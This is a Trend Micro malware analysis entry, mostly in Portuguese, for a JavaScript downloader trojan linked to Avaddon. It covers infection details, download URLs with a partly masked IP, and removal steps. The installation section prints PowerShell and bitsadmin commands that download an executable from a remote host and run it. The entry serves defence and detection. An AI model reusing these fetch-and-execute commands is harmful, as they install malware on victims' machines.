Analisado por: Bren Matthew Ebriega   

 

Trojan:Win32/AggBITSAbuse.A (MICROSOFT); PowerShell/TrojanDownloader.Agent.DV trojan (NOD32)

 Plataforma:

Windows

 Classificao do risco total:
 Potencial de dano:
 Potencial de distribuição:
 infecção relatada:
 Exposição das informações:
Baixo
Medium
Alto
Crítico

  • Tipo de grayware:
    Trojan

  • Destrutivo:
    Não

  • Criptografado:
    Não

  • In the Wild:
    Sim

  Visão geral

Canal de infecção: Baixados da Internet

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Depois, executa os arquivos baixados. Como resultado, as rotinas mal-intencionadas dos arquivos baixados são exibidas no sistema afetado.

  Detalhes técnicos

Tipo de compactação: 408 bytes
Tipo de arquivo: JS
Residente na memória: Não
Data de recebimento das amostras iniciais: 10 de junho de 2020
Carga útil: Connects to URLs/IPs, Downloads files

Detalhes da chegada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalao

Ele adiciona os seguintes processos:

  • %System%\cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe}','%User Temp%\{random numbers}.exe');Start-Process '%User Temp%\{random numbers}.exe'
  • %System%\cmd.exe /c bitsadmin /transfer getitman /download /priority high http:/{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe} %User Temp%\{random numbers}.exe&start %User Temp%\{random numbers}.exe

Rotina de download

Baixa um arquivo da seguinte URL e renomeia esse arquivo assim que armazenado no sistema afetado:

  • http://{BLOCKED}.{BLOCKED}.117.63/jpr.exe
  • http://{BLOCKED}.{BLOCKED}.117.63/sava.exe

Ele salva os arquivos que baixa usando os nomes a seguir:

Depois, executa os arquivos baixados. Como resultado, as rotinas mal-intencionadas dos arquivos baixados são exibidas no sistema afetado.

  Solução

Mecanismo de varredura mínima: 9.850
Primeiro arquivo padrão VSAPI: 15.924.02
Data do lançamento do primeiro padrão VSAPI: 11 de junho de 2020
VSAPI OPR Pattern Version: 15.925.00
VSAPI OPR Pattern veröffentlicht am: 12 de junho de 2020

Step 1

Para os usuários do Windows ME e XP, antes de realizar qualquer varredura, verifique se você desabilitou a Restauração do Sistema para permitir a varredura completa do computador.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Faça uma varredura em seu computador com o produto Trend Micro para excluir os arquivos detectados como Trojan.JS.AVADDON.YJAF-A Se os arquivos detectados já tiverem sido limpos, excluídos ou colocados em quarentena pelo seu produto da Trend Micro, nada mais é necessário. Você pode optar por simplesmente excluir os arquivos em quarentena. Para obter mais informações, verifique a página da Base de Conhecimento.


Participe da nossa pesquisa!